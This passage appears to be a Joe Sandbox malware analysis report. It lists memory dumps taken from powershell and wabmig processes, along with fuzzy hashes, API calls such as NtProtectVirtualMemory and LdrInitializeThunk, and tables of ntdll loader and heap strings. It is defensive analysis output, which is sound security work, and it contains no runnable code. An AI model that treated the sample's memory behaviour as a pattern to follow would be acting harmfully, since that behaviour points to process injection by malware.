              • Instruction Fuzzy Hash: 702178B1308399AFD7301AAA89057A3BB955F85750F18886BE544CF282D969D884C361
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 571de021dba921b71996efb8afa288267743ea83db56552d8bd0e2825dc911da
              • Instruction ID: ce276cc1056f82ef1a8dad8648491ce1f7405a8e80a20357d966892dd775add0
              • Opcode Fuzzy Hash: 571de021dba921b71996efb8afa288267743ea83db56552d8bd0e2825dc911da
              • Instruction Fuzzy Hash: A1219775B046059FC724CF18C884A66FBB6FFC5250B19C5AAD8198B252C732DC86CB51
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39e1beafd4868edea40efa8ad4fc285949ccd13747ad5c1143b2f749dc61ec19
              • Instruction ID: 782995467b5219a02aa5f7b2e8ed532fd37e27ad2151d61b302fdfd18e1513e9
              • Opcode Fuzzy Hash: 39e1beafd4868edea40efa8ad4fc285949ccd13747ad5c1143b2f749dc61ec19
              • Instruction Fuzzy Hash: DD312B74A046499FCB05CF58C5849AAFBF1FF49310B15859AD848EB762C335EC91CBA0
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 558cd0ebfb48e125d06bff0bd51d1a0256df8fe030f9d93480fe5d7323efdcc2
              • Instruction ID: a79ed4fa38adbba7ba97c10a41d4bbb9f565f8af28b93c64805b2c6fece71fe1
              • Opcode Fuzzy Hash: 558cd0ebfb48e125d06bff0bd51d1a0256df8fe030f9d93480fe5d7323efdcc2
              • Instruction Fuzzy Hash: 7D21D874A002099FCB05CFA9C5909AEBBF1FF49310B258599D849EB765C735EC91CFA0
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c82a7f69c85e1f0411beb2a0afb7f28ae61043c8ebe23ff02dfa5a6b376ad515
              • Instruction ID: f16a6ae5539009cf2945b1d96222743e3aea98c3ca0a61e445e89af8911a4930
              • Opcode Fuzzy Hash: c82a7f69c85e1f0411beb2a0afb7f28ae61043c8ebe23ff02dfa5a6b376ad515
              • Instruction Fuzzy Hash: 6511F674A0424ADFCB00DF98D9849AEFBB5FF89310B148599E909AB352C731FD41CBA1
              Memory Dump Source
              • Source File: 00000006.00000002.2223941182.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_77b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86502b78c71574040ce210452c782f3519bef9dda6ee62792ea83344988b4ab9
              • Instruction ID: 7b9a820118923be9dfbf501091d9f78c752826426fe55f8311749367c92a19a8
              • Opcode Fuzzy Hash: 86502b78c71574040ce210452c782f3519bef9dda6ee62792ea83344988b4ab9
              • Instruction Fuzzy Hash: 4301F77A3003169FC734596AD4006FBF7999BC56A2F14C83FD989CB651D772C849C760
              Memory Dump Source
              • Source File: 00000006.00000002.2216532754.00000000048C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_48c0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 429f1fcd08a152823939c76f753e20915eace06d1a6af7e356bfabb0144f0e6e
              • Instruction ID: ac1a7337836d82e9085186b0e2482491bee8b1499c605a44389868e69003b586
              • Opcode Fuzzy Hash: 429f1fcd08a152823939c76f753e20915eace06d1a6af7e356bfabb0144f0e6e

              Execution Graph

              Execution Coverage:0%
              Dynamic/Decrypted Code Coverage:95.8%
              Signature Coverage:25.3%
              Total number of Nodes:95
              Total number of Limit Nodes:0

              Control-flow Graph

              APIs
              • Sleep.KERNELBASE(00000005), ref: 0477E6E2
              • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0477E728
              Memory Dump Source
              • Source File: 0000000A.00000002.2430056640.0000000003D80000.00000040.00000400.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_3d80000_wabmig.jbxd
              Similarity
              • API ID: MemoryProtectSleepVirtual
              • String ID:
              • API String ID: 3235210055-0
              • Opcode ID: ebe4981c5d3dbd649a7742f3c74ec9fb5e91173ddd1b1bf0dd7e5333201190a3
              • Instruction ID: df4e89965b762a7e9dcabaf327a1b3e765e2727b2e7f79e885ac4dfc3acf84b2
              • Opcode Fuzzy Hash: ebe4981c5d3dbd649a7742f3c74ec9fb5e91173ddd1b1bf0dd7e5333201190a3
              • Instruction Fuzzy Hash: E41129B15113019FEB459F35CDCD7E9B361AF243A1F898298EC409B2FAD368D880CB12

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 12 219b35c0-219b35cc LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: acb4913284ab2f86edc37c27f30282847216cff7d92f450abea3fa7d6220043f
              • Instruction ID: ff7d515fbe30354d2c6d760eee544f42bebf3ec1aa6cba7be8d38250c07f6887
              • Opcode Fuzzy Hash: acb4913284ab2f86edc37c27f30282847216cff7d92f450abea3fa7d6220043f
              • Instruction Fuzzy Hash: DB90023160560402D100725D4558706500957D4601F65C421A0864528DC7968A5166A3

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 11 219b2df0-219b2dfc LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 451fe47937b4266198593e360487c322a475ec8653add305824a1e2cb2fdb923
              • Instruction ID: eed2167fa725aab04c90a189d70c05bce848eff0f815908af0abd603e47f13a2
              • Opcode Fuzzy Hash: 451fe47937b4266198593e360487c322a475ec8653add305824a1e2cb2fdb923
              • Instruction Fuzzy Hash: 5D90023120150413D111725D4548707400D57D4641F95C422A0864518DD6578A52A222

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 10 219b2c70-219b2c7c LdrInitializeThunk
              APIs
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 18f8cb0ee641cea003bf5341d8bc90d596e0180a2ab9a343ef04cedf4cbf6255
              • Instruction ID: 6fccb2dd50ddd6f1fb7f46ebfe142dbc3632165f2a3b78d8da3a3e1cc50ea9a5
              • Opcode Fuzzy Hash: 18f8cb0ee641cea003bf5341d8bc90d596e0180a2ab9a343ef04cedf4cbf6255
              • Instruction Fuzzy Hash: E190023120158802D110725D844874A400957D4701F59C421A4864618DC69689917222
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
              • API String ID: 0-2160512332
              • Opcode ID: 68531f2bd67e68bfb539461687340dbc82dffd6f08cf5f0633a87a1b8ff854aa
              • Instruction ID: 131288060137bc68c01ca47432f175a32abad85203726896c174a5755a844ca5
              • Opcode Fuzzy Hash: 68531f2bd67e68bfb539461687340dbc82dffd6f08cf5f0633a87a1b8ff854aa
              • Instruction Fuzzy Hash: 62929A71A08742AFE721CF24C880F5BBBE8BB85754F10492DFA98D7290D774E944CB92
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
              • API String ID: 0-3591852110
              • Opcode ID: 622979bca3ad2104e0698eac0af7f7a7a240933f3f95d1f2a2bfec35ab0a4d25
              • Instruction ID: 4dabb9d004ecd761909ac890d8584899f67c633bd4664137547b7d9cde71df2f
              • Opcode Fuzzy Hash: 622979bca3ad2104e0698eac0af7f7a7a240933f3f95d1f2a2bfec35ab0a4d25
              • Instruction Fuzzy Hash: AD12D771600A42DFD725CF65C480BBABBF6FF4A714F18845DE48A8B642E735E981CB90
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
              • API String ID: 0-3532704233
              • Opcode ID: 28139f4a13b3bd5234e4788a074a731fc34943e79fe1e99ad7010ba466297cf3
              • Instruction ID: 1d06605a5ab5f544afa59f7cc77c83b58aa965924451936e1c6a515c626d3fee
              • Opcode Fuzzy Hash: 28139f4a13b3bd5234e4788a074a731fc34943e79fe1e99ad7010ba466297cf3
              • Instruction Fuzzy Hash: DBB17A719083969FD711CF29C880A5BBBECAB89754F01496EF9DCD7240E731DA448BA2
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
              • API String ID: 0-3063724069
              • Opcode ID: f296cff9e5c28356f09cddbc5dee0ea5cfd9caec9f224c374f7746a6b6e0ae2d
              • Instruction ID: b1a9ae6e9d966da67c951438f97b7f684f95544984e05bc49cb01e2fdaecf9d2
              • Opcode Fuzzy Hash: f296cff9e5c28356f09cddbc5dee0ea5cfd9caec9f224c374f7746a6b6e0ae2d
              • Instruction Fuzzy Hash: F5D1E3B2805312AFD722CF64D840B5BBBE8BFA5754F45092DFA9CA7150E730CA44CB92
              Strings
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
              • API String ID: 0-1700792311
              • Opcode ID: 105955a781cf2c1c25fc5c624e942c56f9b53e94deb1224ec3974c0f4c22c440
              • Instruction ID: 5cd960e882706acf8d03b9912dcfb3179cdeadb5b453bccc8abd55debc046399
              • Opcode Fuzzy Hash: 105955a781cf2c1c25fc5c624e942c56f9b53e94deb1224ec3974c0f4c22c440
              • Instruction Fuzzy Hash: F0D12335A00A85DFDB12CF74C551AAEBFF5FF4A314F088059E4499B26AD739D981CB20
              Strings
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 2196D2C3
              • @, xrefs: 2196D2AF
              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 2196D146
              • Control Panel\Desktop\LanguageConfiguration, xrefs: 2196D196
              • @, xrefs: 2196D0FD
              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 2196D0CF
              • @, xrefs: 2196D313
              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 2196D262
              Similarity
              • API ID:
              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
              • API String ID: 0-1356375266
              Strings
              Similarity
              • API ID:
              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
              • API String ID: 0-523794902
              Strings
              Similarity
              • API ID:
              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
              • API String ID: 0-122214566
              Strings
              Similarity
              • API ID:
              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
              • API String ID: 0-792281065
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
              • API String ID: 0-1745908468
              Strings
              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 219C9A2A
              • apphelp.dll, xrefs: 21966496
              • LdrpInitShimEngine, xrefs: 219C99F4, 219C9A07, 219C9A30
              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 219C99ED
              • minkernel\ntdll\ldrinit.c, xrefs: 219C9A11, 219C9A3A
              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 219C9A01
              Similarity
              • API ID:
              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
              • API String ID: 0-204845295
              Strings
              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 219E02E7
              • RTL: Re-Waiting, xrefs: 219E031E
              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 219E02BD
              Similarity
              • API ID:
              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
              • API String ID: 0-2474120054
              Strings
              • WindowsExcludedProcs, xrefs: 2199522A
              • Kernel-MUI-Language-Disallowed, xrefs: 21995352
              • Kernel-MUI-Number-Allowed, xrefs: 21995247
              • Kernel-MUI-Language-Allowed, xrefs: 2199527B
              • Kernel-MUI-Language-SKU, xrefs: 2199542B
              Similarity
              • API ID:
              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
              • API String ID: 0-258546922
              APIs
                • Part of subcall function 219B2DF0: LdrInitializeThunk.NTDLL ref: 219B2DFA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0BA3
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0BB6
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0D60
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 219B0D74
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
              • String ID:
              • API String ID: 1404860816-0
              Strings
              Similarity
              • API ID:
              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1975516107
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              Strings
              Similarity
              • API ID:
              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
              • API String ID: 0-3570731704
              Strings
              Similarity
              • API ID:
              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
              • API String ID: 0-379654539
              Strings
              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 219A855E
              • @, xrefs: 219A8591
              • LdrpInitializeProcess, xrefs: 219A8422
              • minkernel\ntdll\ldrinit.c, xrefs: 219A8421
              Similarity
              • API ID:
              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
              • API String ID: 0-1918872054
              Strings
              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 219D10AE
              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 219D106B
              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 219D0FE5
              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 219D1028
              Similarity
              • API ID:
              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
              • API String ID: 0-1468400865
              Strings
              Similarity
              • API ID:
              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
              • API String ID: 0-336120773
              Strings
              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 219DA992
              • apphelp.dll, xrefs: 21992462
              • LdrpDynamicShimModule, xrefs: 219DA998
              • minkernel\ntdll\ldrinit.c, xrefs: 219DA9A2
              Similarity
              • API ID:
              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
              • API String ID: 0-176724104
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
              • API String ID: 0-1391187441
              Strings
              Similarity
              • API ID:
              • String ID: $ $0
              • API String ID: 0-3352262554
              Strings
              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 21971728
              • HEAP[%wZ]: , xrefs: 21971712
              • HEAP: , xrefs: 21971596
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
              • API String ID: 0-3178619729
              Strings
              Similarity
              • API ID:
              • String ID: FilterFullPath$UseFilter$\??\
              • API String ID: 0-2779062949
              Strings
              Similarity
              • API ID:
              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
              • API String ID: 0-373624363
              Strings
              Similarity
              • API ID:
              • String ID: %$&$@
              Strings
              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 219CE6C6
              • HEAP[%wZ]: , xrefs: 219CE6A6
              • HEAP: , xrefs: 219CE6B3
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
              Strings
              • Could not validate the crypto signature for DLL %wZ, xrefs: 219DA589
              • minkernel\ntdll\ldrmap.c, xrefs: 219DA59A
              • LdrpCompleteMapModule, xrefs: 219DA590
              Similarity
              • API ID:
              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
              Strings
              Similarity
              • API ID:
              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
              Strings
              • PreferredUILanguages, xrefs: 21A2C212
              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 21A2C1C5
              • @, xrefs: 21A2C1F1
              Similarity
              • API ID:
              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
              Strings
              Similarity
              • API ID:
              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
              Strings
              • RtlCreateActivationContext, xrefs: 219E29F9
              • Actx , xrefs: 219A33AC
              • SXS: %s() passed the empty activation context data, xrefs: 219E29FE
              Similarity
              • API ID:
              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
              Strings
              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 219FB632
              • @, xrefs: 219FB670
              • GlobalFlag, xrefs: 219FB68F
              Similarity
              • API ID:
              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
              Strings
              • @, xrefs: 219B12A5
              • BuildLabEx, xrefs: 219B130F
              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 219B127B
              Similarity
              • API ID:
              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
              Strings
              • LdrpInitializationFailure, xrefs: 219F20FA
              • Process initialization failed with status 0x%08lx, xrefs: 219F20F3
              • minkernel\ntdll\ldrinit.c, xrefs: 219F2104
              Similarity
              • API ID:
              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
              APIs
              Strings
              Similarity
              • API ID: ___swprintf_l
              • String ID: #%u
              Strings
              Similarity
              • API ID:
              • String ID: @$@
              Strings
              Similarity
              • API ID:
              • String ID: `$`
              Strings
              • kLsE, xrefs: 21970540
              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 2197063D
              Similarity
              • API ID:
              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
              Strings
              • RtlpResUltimateFallbackInfo Enter, xrefs: 2197A2FB
              • RtlpResUltimateFallbackInfo Exit, xrefs: 2197A309
              Similarity
              • API ID:
              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
              Strings
              Similarity
              • API ID:
              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
              Strings
              Similarity
              • API ID:
              • String ID: .Local\$@
              Strings
              • RtlpInitializeAssemblyStorageMap, xrefs: 219E2A90
              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 219E2A95
              Similarity
              • API ID:
              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
              Strings
              Similarity
              • API ID: InitializeThunk
              • String ID: Cleanup Group$Threadpool!
              Similarity
              • API ID:
              • String ID:
              Strings
              Similarity
              • API ID:
              • String ID: ~$cA(
              Strings
              Similarity
              • API ID:
              • String ID: PreferredUILanguages
              Strings
              Similarity
              • API ID:
              • String ID: kLsE
              Strings
              Similarity
              • API ID:
              • String ID: #
              Similarity
              • API ID:
              • String ID: Actx
              • API String ID: 0-89312691
              • Opcode ID: 0424b7bff45451cf42b132f8e16ebc14202d07bd52795da88feb8457467a9add
              • Instruction ID: 6b04ea7b07f5fa8bbca13d139a7396bcb461a131ec2723921138e1775d904459
              • Opcode Fuzzy Hash: 0424b7bff45451cf42b132f8e16ebc14202d07bd52795da88feb8457467a9add
              • Instruction Fuzzy Hash: F311D0B07092068BF7965A189850E16B7FDFF82666F3081AEE56CCB391D672DC43C380
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 44b8cc3f0500945c16b1b3a821d4569a9c19afea9f138b9f2bb8f6e78130f39c
              • Instruction ID: dde49e91ef98ed616d6ce7e108cd61ee6e28da455107592d395ecae6df075fbf
              • Opcode Fuzzy Hash: 44b8cc3f0500945c16b1b3a821d4569a9c19afea9f138b9f2bb8f6e78130f39c
              • Instruction Fuzzy Hash: 22511872E00606EFEB09DF64C948F5DB7B9FF55312F118069D519932A0DB749A02CF80
              Memory Dump Source
              • Source File: 0000000A.00000002.2447023749.0000000021940000.00000040.00001000.00020000.00000000.sdmp, Offset: 21940000, based on PE: true
              • Associated: 0000000A.00000002.2447023749.0000000021A69000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021A6D000.00000040.00001000.00020000.00000000.sdmpDownload File
              • Associated: 0000000A.00000002.2447023749.0000000021ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_10_2_21940000_wabmig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d36068041c75795403cc7184362e6744459f6d8116447e139e3dae71bec9b0f
              • Instruction ID: 2a574a9885998cbf0dfe4f05d63399670908ef70d8f3e92d8888387b076e2921
